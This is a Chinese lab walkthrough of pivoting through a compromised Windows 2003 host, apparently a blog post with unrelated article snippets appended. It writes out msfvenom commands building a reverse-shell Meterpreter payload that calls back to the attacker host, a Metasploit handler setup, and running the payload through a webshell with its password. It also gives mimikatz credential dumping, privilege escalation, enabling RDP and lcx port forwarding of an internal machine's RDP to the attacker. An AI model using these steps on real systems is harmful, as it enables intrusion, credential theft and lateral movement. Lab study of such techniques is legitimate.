内网端口转发与代理

思路:渗透的前提是双方能够建立通信。目前无法和win7建立通信,但是拿到了windows2003的权限,所以可以在Windows2003主机上面建立节点,作为跳板机去访问到内网。

目前状态:控制win2003(IP:192.168.1.200/10.1.3.128)
                  发现内网win7和win10
目的:通过控制的win2003  访问win7(IP:10.1.3.136如果是192.168.1.162也可以),
        win10无法远程连接??

攻击机:本地192.168.1.122
                VM kali:192.168.1.146(10.1.2.152)

MSF代理转发通信(正向连接)
1,利用MSF生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe
结果:
    msf6 > msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe
    [*] exec: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe


2,msf进入监听模式
输入命令设置本地监听,具体命令如下:
启动msf:
        msfconsole
选择工具:
        use exploit/multi/handler
设置攻击语句:
        set payload windows/meterpreter/reverse_tcp
设置监听IP(注意IP地址是本地kali机器的IP地址):
        set lhost 192.168.1.146
设置监听端口:
        set lport 4444
开始监听:
        exploit或者run


3,使用webshell将脚本上传都目标服务器(蚁剑为例)

        2003中,phpstudy的端口为90,

        外网访问 http://192.168.1.200:90/phpinfo.php(相对内网来说)

蚁剑配置IP:192.168.1.200:90/123.php,密码为123
    编码器:选择base64(两个),点击测试,提示测试成功

通过蚁剑上传su.exe,
通过蚁剑的控制台运行su.exe
C:\phpStudy\WWW> su.exe

msf上线
[*] Started reverse TCP handler on 192.168.1.146:4444
[*] Sending stage (175686 bytes) to 192.168.1.200
[*] Meterpreter session 1 opened (192.168.1.146:4444 -> 192.168.1.200:1082) at 2024-04-29 00:57:12 -0400

【win2003中的IIS还有一个内部访问网站,IP为2003的IP(10.1.3.128),端口84,本地可以访问http://10.1.3.128:84

这里有两个网站,IIS的04网站是内网访问,PHPStudy的网站是外网访问,

被一句话木马控制的是php网站,蚁剑上传的木马也是上传到PHP网站内,所以这里跟IIS的网站好像无关。。。】


5,信息收集
调用mimikatz模块:
load mimikatz
收集账号密码:
creds_all
查看当前目标机器IP地址:
ipconfig
需要提升为system权限:
getsystem

查询权限
getuid

6,使用转发工具进行lcx.exe端口转发

        通过蚁剑上传lcx.exe到win2003


7,开启3389远程桌面(其实2003不开启3389,win7开启,也能端口转发,但是怎么开启win7的远程桌面呢?)
run getgui -e

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[-] The specified meterpreter session script could not be found: getgui

上面运行失败,这时可以运行
run post/windows/manage/enable_rdp
结果:成功
meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20240429034339_default_192.168.1.200_host.windows.cle_651229.txt


目前状态:控制win2003(IP:192.168.1.200/10.1.3.128)
            发现内网win7和win10
目的,通过控制的win2003访问win7(IP:192.168.1.162),
win10无法远程连接??

攻击机:本地192.168.1.122
        VMkali:192.168.1.146(10.1.2.152)


8,MSF进入shell命令行,执行命令,将目标机器的3389端口转发到攻击机的IP地址和自定义端口上
shell(注意,这里一定要进入shell,否则命令无效)
        lcx.exe -slave 192.168.1.122(攻击机) 53 10.1.3.136(win7,内网其它机器) 3389
        lcx.exe -slave 192.168.1.122 53 10.1.3.136 3389
说明:2003的通过端口转发,把内网另外一台机器的3389端口转发给攻击机53

这样也是可以的,如果不是内网IP的话

9,本地攻击机执行命令实现端口二次转发(lcx工具的规定用法)
打开本机(不是kali,目前是x13)中的
E:\......\工具\工具\lcx
目录下的1.bat,执行以下命令 (这条命令最好比第8条先执行)(其实就是在lcx.exe位置打开cmd.exe)
lcx.exe -listen 53 1234

10,攻击机打开远程桌面连接,直接连接本机的1234端口

目前存在的问题:怎么获取win7的账号密码,怎么开启win7的3389

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/320965.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

扩展学习|一文读懂知识图谱

一、知识图谱的技术实现流程及相关应用 文献来源:曹倩,赵一鸣.知识图谱的技术实现流程及相关应用[J].情报理论与实践,2015, 38(12):127-132. (一)知识图谱的特征及功能 知识图谱是为了适应新的网络信息环境而产生的一种语义知识组织和服务的方…

第8篇:创建Nios II工程之读取Switch的值<一>

Q:本期我们再添加一个PIO组件设为输入,创建Nios II工程读取输入值显示在LED上。 A:在前2期创建的控制LED工程的Platform Designer系统基础上再添加一个PIO核,参数设置为18位和单向输入模式,表示DE2-115开发板上的18个…

Ubuntu进行换源

各种源大全 在此地 // 此源均只适用Ubuntu 18.04 版本,其他版本需要修改 bionic 为对应的Ubuntu版本#阿里云源地址 deb http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ bionic-security ma…

Anaconda删除虚拟环境目录pkgs和envs|conda瘦身

这个文件夹里面是专门放不同环境中的包的,只是没有区分环境,都混在一起了, 一般在想要删除一个虚拟环境,除了在命令行中输入conda remove -n your_env_name(虚拟环境名称) --all 然后在envs中删除虚拟环境的文件夹, 还…

Vector Laboratories|用于生物偶联疗法BioDesign™ dPEG® Linker连接平台

术语dPEG代表“离散PEG(discrete PEG)”,这是一种均一的、单分子量(MW)、高纯度的新一代聚乙二醇聚合物。Vector Laboratorie采用其受专利保护的专有生产工艺,可生产提供适合于各种应用场景,具有…

在做题中学习(50):搜索插入位置

35. 搜索插入位置 - 力扣(LeetCode) 解法:二分查找 思路:题目是有序的,时间复杂度O(logN),二分没跑了,题目说如果找不到target,返回它应该被插入位置的下标,所以可以分析一下示例2…

ElasticSearch知识点汇总

1、ES中的​​​​​​​倒排索引是什么。 倒排索引,是通过分词策略,形成了词和文章的映射关系表,这种词典映射表即为倒排索引 2、ES是如何实现master选举的。 选举过程主要包括以下几个步骤: 心跳检测: 每个节点…

“Postman 中文版使用教程:如何切换到中文界面?”

Postman 的很好用的接口测试软件。但是,Postman 默认是英文版的,也不支持在软件内切换为中文版。很多同学的英语并不是很好,看到一堆的英文很是头痛。 今天我们来介绍下:切换到 Postman 中文版的方法。想要学习更多的关于 Postma…

药物代谢动力学学习笔记

一、基本概念 二、经典房室模型 三、非线性药物代谢动力学 四、非房室模型 五、药代动力学与药效动力学 六、生物等效性评价 七、生物样品分析方法 基本概念 生物样品:生物机体的全血、血浆、血清、粪便、尿液或其他组织的样品 特异性,specificity&…

nvcc: command not found

nvcc: command not found nvcc命令是 NVIDIA CUDA 编译器,就类似于gcc是c语言的编译器,用于编译 CUDA 代码并生成 GPU 可执行文件。由于程序是要经过编译器编程成可执行的二进制文件,而cuda程序有两种代码,一种是运行在CPU上的ho…

改变视觉创造力:图像合成中基于样式的生成架构的影响和创新

原文地址:revolutionizing-visual-creativity-the-impact-and-innovations-of-style-based-generative 2024 年 4 月 30 日 介绍 基于风格的生成架构已经开辟了一个利基市场,它将机器学习的技术严谨性与类人创造力的微妙表现力融为一体。这一发展的核…

消费金融平台公司如何做大做强自营产品

本文来自于2019年的某次内部分享沟通会,部分敏感内容已做删减。

基于python+django网易新闻+评论的舆情热点分析平台

博主介绍: 大家好,本人精通Java、Python、C#、C、C编程语言,同时也熟练掌握微信小程序、Php和Android等技术,能够为大家提供全方位的技术支持和交流。 我有丰富的成品Java、Python、C#毕设项目经验,能够为学生提供各类…

密码学《图解密码技术》 记录学习 第十四章

目录 十四章 14.1 本章学习的内容 14.2 什么是 SSL/TLS 14.2.1 Alice 在 Bob 书店买书 14.2.2 客户端与服务器 14.2.3 АSSL/TLS 承载HTTP 14.2.4 SSL/TLS的工作 14.2.5 SSL/TLS也可以保护其他的协议 14.2.6 密码套件 14.2.7 SSL 与 TLS 的区别 14.3 使用 SSL/TLS 进…

如何有效访问Exness官网中文版!技巧与注意事项

Exness是一家全球知名的在线外汇和差价合约经纪商,为全球客户提供丰富的交易工具。由于Exness的国际化运营,它提供多种语言版本的官网,其中包括中文版。为了确保用户在Exness官网中文版的访问体验良好,了解一些技巧和注意事项至关…

为什么SSL证书的有效期很短?

在当今互联网世界中,SSL证书作为保障网站数据传输安全的重要工具,其有效期往往被设定为相对较短的时间。对于许多非专业人士来说,可能会好奇:为什么SSL证书不能像其他证件一样拥有较长的有效期呢?今天,我们…

桌面文件删除了怎么恢复?4个靠谱方法分享!

“我平常工作的时候喜欢将文件直接保存在电脑桌面上,但是今天一打开电脑,突然发现我的文件都不见了,有什么恢复桌面文件的简单方法吗?希望大家可以推荐几个。” 很多用户在使用电脑时可能都习惯了把文件直接放在桌面上&#xff0c…

Linux主机重启后报错:[FAILED] Failed to start Switch Root.

一、问题描述 某次云主机因计费问题,导致批量重启,重启后发现某台云主机竟进入紧急救援模式(emergency模式),如下所示: 二、原因及处理 1)原因:加载根分区失败,导致无…

盒模型,BFC以及行内块级元素

一.盒模型篇 css基础框盒模型介绍: 当对一个文档进行布局的时候,浏览器的渲染引擎会根据标准之一的css基础框盒模型,将所有元素表示为一个个矩形的盒子,每个盒子由四部分组成,分别是内容 内边距 边框 外边距&#xff…

每日OJ题_DFS解决FloodFill⑥_力扣529. 扫雷游戏

目录 力扣529. 扫雷游戏 解析代码 力扣529. 扫雷游戏 529. 扫雷游戏 难度 中等 让我们一起来玩扫雷游戏! 给你一个大小为 m x n 二维字符矩阵 board ,表示扫雷游戏的盘面,其中: M 代表一个 未挖出的 地雷,E 代表…